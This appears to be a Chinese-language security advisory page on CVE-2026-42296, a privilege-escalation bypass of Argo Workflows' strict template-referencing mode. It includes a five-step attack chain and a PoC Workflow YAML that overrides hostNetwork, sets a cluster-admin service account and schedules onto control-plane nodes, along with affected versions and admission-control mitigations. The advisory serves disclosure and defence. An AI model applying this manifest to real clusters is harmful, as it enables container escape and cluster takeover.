IPBUF安全漏洞报告
English
CVE-2026-42296 CVSS 8.1 高危

CVE-2026-42296 Argo Workflows 严格模式绕过漏洞

披露日期: 2026-05-09
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-42296
漏洞类型
权限提升
CVSS评分
8.1 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Argo Workflows

相关标签

权限提升容器逃逸Argo WorkflowsKubernetes安全绕过

漏洞概述

Argo Workflows 早期版本存在严格模式绕过漏洞,具有创建 Workflow 权限的攻击者可规避 templateReferencing: Strict 限制,非法获取主机网络访问权、切换服务账户或覆盖 Pod 安全上下文,严重威胁 Kubernetes 集群安全。

技术细节

该漏洞的核心在于 Argo Workflows 对 `templateReferencing: Strict` 策略的校验逻辑存在缺陷。在 Strict 模式下,系统本应禁止用户覆盖模板中的安全敏感字段。然而,攻击者可以构造特定的 Workflow YAML,在引用模板的同时通过字段注入覆盖 `hostNetwork`、`serviceAccountName`、`tolerations` 等关键参数。如果集群仅依赖 Argo 的 Strict 模式进行防护而未启用 Kubernetes 原生准入控制(如 OPA/Gatekeeper 或 PodSecurity),攻击者即可利用此漏洞将恶意 Pod 调度至控制平面节点、挂载高权限 Service Account Token 或启用主机网络,从而实现容器逃逸、横向移动甚至接管整个 Kubernetes 集群。

攻击链分析

STEP 1
1. 信息收集
攻击者识别目标环境使用了存在漏洞的 Argo Workflows 版本(< 3.7.14 或 < 4.0.5),并确认开启了 templateReferencing: Strict 模式。
STEP 2
2. 获取权限
攻击者获取一个具有 create Workflow 权限的合法 Kubernetes 账户凭证。
STEP 3
3. 构造恶意载荷
攻击者编写恶意的 Workflow YAML 文件,引用受 Strict 模式保护的模板,但在 Workflow 层面显式添加 hostNetwork、serviceAccountName 等覆盖字段。
STEP 4
4. 提交与执行
攻击者向 Argo API 提交该 Workflow,系统因漏洞未能正确校验覆盖字段,导致 Pod 以高权限(如主机网络、控制平面调度)启动。
STEP 5
5. 权限提升与控制
恶意 Pod 运行后,攻击者利用主机网络访问内网或挂载的 SA Token 进一步控制 Kubernetes 集群节点和资源。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
apiVersion: argoproj.io/v1alpha1 kind: Workflow metadata: name: strict-bypass-poc generateName: strict-bypass- spec: entrypoint: whalesay # Vulnerability: Even with strict template referencing, # specific fields can be overridden to escape restrictions. workflowTemplateRef: name: workflow-template-strict # Injecting malicious overrides directly in the workflow spec hostNetwork: true # Bypassing host network restriction serviceAccountName: cluster-admin # Privilege Escalation tolerations: - key: node-role.kubernetes.io/control-plane operator: Exists effect: NoSchedule # Scheduling on control-plane nodes templates: - name: whalesay container: image: docker/whalesay:latest command: [cowsay] args: ["Hello Argo - Bypassed Strict Mode!"]

影响范围

Argo Workflows < 3.7.14
Argo Workflows >= 4.0.0, < 4.0.5

防御指南

临时缓解措施
在未升级补丁前,建议立即启用 Kubernetes 原生的准入控制机制(如 PodSecurity 或 OPA/Gatekeeper),明确禁止普通用户创建具有 hostNetwork 权限、挂载 Service Account Token 或容忍控制平面节点的 Pod,从而阻断该漏洞的利用路径。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。